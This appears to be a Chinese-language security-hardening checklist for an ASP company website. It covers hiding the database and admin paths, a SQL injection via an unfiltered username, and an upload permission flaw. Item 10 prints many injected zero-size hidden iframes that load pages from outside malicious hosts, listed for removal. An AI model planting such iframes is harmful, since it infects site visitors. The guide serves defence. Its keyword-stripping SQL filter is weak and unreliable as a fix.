1.數(shù)據(jù)庫防下載措施

方法：新增一個(gè)<%NoDown%>表。里面寫語句，只要不執(zhí)行ASP語句即可

2.數(shù)據(jù)庫名改為帶#%&之類的名稱,修改默認(rèn)的數(shù)據(jù)庫路徑為xiuji_Data/#jdzscmyitime#.asa

需要修改的文件

Xiujimanage/conn.asp

Inc/conn.asp

3.修改后臺(tái)默認(rèn)路徑admin為xiujimanage

需修改的文件：

ProductContent.asp

Inc/ProductContent.asp

4. 將后臺(tái)數(shù)據(jù)庫備份文本框改只讀,方法如下:打開Manage_backup.asp

文件,Ctrl+H查找name=bkDBname value="<%=date()%>"替換name=bkDBname value="<%=date()%>" readonly

如不需要備份數(shù)據(jù)庫這功能可以刪除該文件

5.隱藏admin表,方法如下:打開您的數(shù)據(jù)庫,右鍵點(diǎn)擊admin表,點(diǎn)擊屬性,將隱藏打勾.

6. 將admin表改名為其他名稱xj2yuanmanage并隱藏,再將涉及到admin表的程序改動(dòng)(這個(gè)工程很大...)再新建一個(gè)admin表,新建user、password兩個(gè)字段名,隨便將兩者填充為16位或者32位字母加數(shù)字.

涉及到的文件：

Xiujimanage/Admin.asp

Xiujimanage/Addmanagerok.asp

Xiujimanage/Admin_ChkLogin.asp

Xiujimanage/Delmanager.asp

Xiujimanage/Manage_Admin.asp

Xiujimanage/Manage_Main3edit.asp

Xiujimanage/Managereditok.asp

Xiujimanage/Sysadmin_view.asp

7. 將后臺(tái)編輯器的數(shù)據(jù)庫文件改只讀,方法:用flashfxp上傳程序后找到該數(shù)據(jù)庫,右鍵點(diǎn)擊,然后屬性修改為不能"寫入",也就防止了數(shù)據(jù)庫被更新,以后需要用再該回來.

具體位置：xiujimanageSouthidcEditorDatasSouthidcEditor.mdb

8.修改

xiujimanageUserModify.asp

CheckReg.asp

GetPassword.asp

Inc/ CheckReg.asp

Inc/ GetPassword.asp

Xiujimanage/UserModify.asp

Xiujimanage/ Manage_edithonor.asp

Xiujimanage/ Manage_edithonor1.asp

Xiujimanage/ Manage_honor_add.asp

Xiujimanage/ Manage_honor_add1.asp

漏洞描述：可以通過username的值未經(jīng)過任何過濾。本來他是用username來獲取session用戶名來進(jìn)行用戶資料的，通過構(gòu)建一些SQL語句可以拿到后臺(tái)用戶名和MD5的密碼，從而進(jìn)入后臺(tái)。

解決方法：在UserName=trim(request("UserName"))后加上如下過濾代碼

UserName=Replace(UserName,"'","")

UserName=Replace(UserName,"%","")

UserName=Replace(UserName," ","")

UserName=Replace(UserName,"exists","")

UserName=Replace(UserName,"select","")

9. upfile_Other.asp

Inc/ upfile_Other.asp

<%

字串9

 

if EnableUploadFile="NO" then

response.write "系統(tǒng)未開放文件上傳功能"

else

if session("AdminName")="" and session("UserName")="" then

response.Write("請(qǐng)登錄后再使用本功能！")

else

select case upload_type

case 0

call upload_0() ''使用化境無組件上傳類

case else

''response.write "本系統(tǒng)未開放插件功能"

''response.end

end select

end if

end if

%>

EnableUploadFile代表上傳文件是否開起，問題在這里

session("AdminName")="" and session("UserName")="" 

這個(gè)文件的session不僅給管理員用還給普通的用戶用，可是前臺(tái)的用戶根本用不上這個(gè)，

字串4

 

補(bǔ)救的方法就是先把a(bǔ)nd session("UserName")="" 給去掉。

10.替換所有

<iframe src=http://zhinanzhen.sdjy.net.cn/guiji/tysx.htm width=0 height=0></iframe>

 <iframe src=http://zhinanzhen.sdjy.net.cn/guiji/tysx.htm width=0 height=0></iframe> <iframE src=/new85tM?075 Width=0 name='4572' heiGht=0></iframe><iframe sRc=/eRRoR/404.html Width=0 name='4572' height=0></iframe> <iframE src=/new85tM?075 Width=0 name='4572' heiGht=0></iframe><iframe sRc=/eRRoR/404.html Width=0 name='4572' height=0></iframe> <ifrAme src=77XXmn/new85tm?075 Width=0 name='3619' height=0></iFrame><iFrame src=/error/404.html width=0 name='3619' heiGht=0></iframe> <iFrame src=hTTp:///new85Tm?075 width=0 name='1015' height=0></ifRame><ifRame src=hTTp:///error/404.hTml widTh=0 name='1015' height=0></iframe>

 <iframe src=http://xxx.mmma.biz/ps.htm width=0 height=0></iframe>

 <iframe src=http://xxx.llxxcx.cn/wm.htm?id=823 width=0 height=0></iframe><iframe src=http://aa.18dd.net/ww/new05.htm?075 width=0 height=0></iframe><iframe src=http://aa.18dd.net/ww/new05.htm?075 width=0 height=0></iframe><iframe src=http://pr.749571.com/ww/new05.htm?013 width=1 height=1></iframe><iframe src=http://pr.749571.com/ww/new05.htm?013 width=1 height=1></iframe> <ifraMe src=/neW85tm?075 width=0 name='4880' hEight=0></iframE><iframE src=/error/404.html Width=0 name='4880' height=0></ifraMe> <ifrAme src=Http:///new85tm?075 wiDth=0 name='2554' height=0></iframe><iframe src=1l1l1oM/error/404.htMl wiDth=0 name='2554' height=0></iframe> <iframe src=77xxMn/new85tM?075 width=0 Name='6233' height=0></iframe><iframe sRc=/eRRoR/404.html width=0 name='6233' height=0></iframe>

 <iframe src=http://pr.749571.com/ww/new05.htm?013 width=1 height=1></iframe><iframe src=http://pr.749571.com/ww/new05.htm?013 width=1 height=1></iframe>

 

職業(yè)SEO一定要注意，網(wǎng)站防黑比SEO更重要，一擔(dān)被人訂上，你的排名也就前功盡棄了。祝你幸運(yùn)噢。